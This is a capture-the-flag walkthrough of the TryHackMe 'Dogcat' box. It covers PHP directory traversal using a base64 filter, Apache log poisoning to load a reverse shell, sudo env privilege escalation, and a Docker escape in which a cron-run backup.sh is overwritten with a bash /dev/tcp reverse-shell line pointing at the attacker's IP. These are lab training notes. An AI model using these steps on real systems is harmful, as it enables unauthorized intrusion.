CHALLENGE OVERVIEW
- Link: THM Dogcat
- Difficulty: Medium
- Target: Flags 1-4
- Highlight: intercepting and modifying a web request using
burpsuite
- Tools used:
base64
,burpsuite
- Tags: docker, directory traversal
BACKGROUND

In this tutorial, we will walk a simple website showing pictures of dogs and cats.
We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine.
At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.
ENUMERATION/RECON

export target=10.10.148.135 Export myIP=10.6.2.23
Let’s walk the site.
It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files.
Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend.
We’ll use a simple PHP filter to convert the contents to base64 and output the raw base64 string.
http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index
Raw output:
PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg==
Let’s save this string as a file named “string
”. Then we can use the command “cat string | base64 -d
” to decrypt this string and view it as raw HTML code.

Reading over this HTML code, we can see that the file extension can be set!
If the user doesn’t specify the extension, the default will be .php
. This means that we can add “&ext=
” to the end of our web address to avoid the .php
extension from being added.
In order for it to properly display our request, we need to include the word “dog” or “cat” in the address.

Let’s dive in with burpsuite
and start intercepting and modifying requests.
Here is our order of steps for us to get our initial foothold on the target machine:
- Create a PHP reverse shell
- Start up our
netcat
listener - Use
burp
to intercept and modify the web request. Wait until later to click “forward
”. - Spin up a simple HTTP server with Python in the same directory as the PHP revshell.
- Click “
forward
” onburp
to send the web request. - Activate the shell by entering:
$targetIP/bshell.php
in the browser address - Catch the revshell on
netcat
!

STEP 1
Let’s create a PHP pentest monkey revshell.

STEP 2
Let’s first start up a netcat
listener on port 2222.
nc -lnvp 2222
STEP 3
Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the shell.php
code and rename it bshell.php
on the target machine.
This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.

STEP 4
We’ll spin up a simple python HTTP server in the same directory as our revshell to serve shell.php
to our target machine via the modified web request we created in burpsuite
.

STEP 5
Click forward on burp and check to see if code 200 came through for shell.php
on the HTTP server.

STEP 6
We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.

STEP 7
We successfully caught it! Now we are in with our initial foothold!

INITIAL FOOTHOLD

LOCATE THE FIRST FLAG
Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.
http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=
Now we can decode this string (saved as firstflag.txt
) with base64
:
base64 --decode firstflag.txt <?php $flag_1 = "THM{Th—------------ommitted—-------fa}" ?>
LOCAL RECON

LOCATE THE SECOND FLAG
We manually enumerate the filesystem and discover the second flag at /var/www/flag2_QMW7JvaY2LvK.txt
Using the command find can help us quickly scan the filesystem for any files which contain the word “flag”.
find / -type f -name '*flag*' 2>/dev/null
We found the second flag in plaintext!
cat flag2_QMW7JvaY2LvK.txt THM{LF—------------ommitted—-------fb}
CHECK SUDO PERMISSIONS
Let’s check out our sudo permissions with the command:
sudo -l Matching Defaults entries for www-data on 26e23794a52b: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on 26e23794a52b: (root) NOPASSWD: /usr/bin/env
EXPLOIT/PRIVILEGE ESCALATION

Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:
$ sudo env /bin/bash
Now we can verify that we are root with the command whoami
.
GRAB THE THIRD FLAG
cd /root ls flag3.txt cat flag3.txt THM{D1—------------ommitted—-------12}
POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER
Let’s start up a new listener to catch the new bash shell outside of the container.
nc -lnvp 3333

We notice that there is a backup.sh
that regularly runs on a schedule via cronjobs. We can hijack this file which is run by root outside of the docker container, by changing the contents to throw a revshell.
echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh flag4.txt cat flag4.txt THM{esc—------------ommitted—-------2d}
FINAL THOUGHTS

This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold.
Once we secured a revshell, the rest of the box went pretty quickly.
The final step of breaking out of a docker container with a second revshell was the sneakiest part for me.
The PHP directory traversal and using a php filter to encode with base64 was also a cool way to evade the data sanitation measures in place on the backend.

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.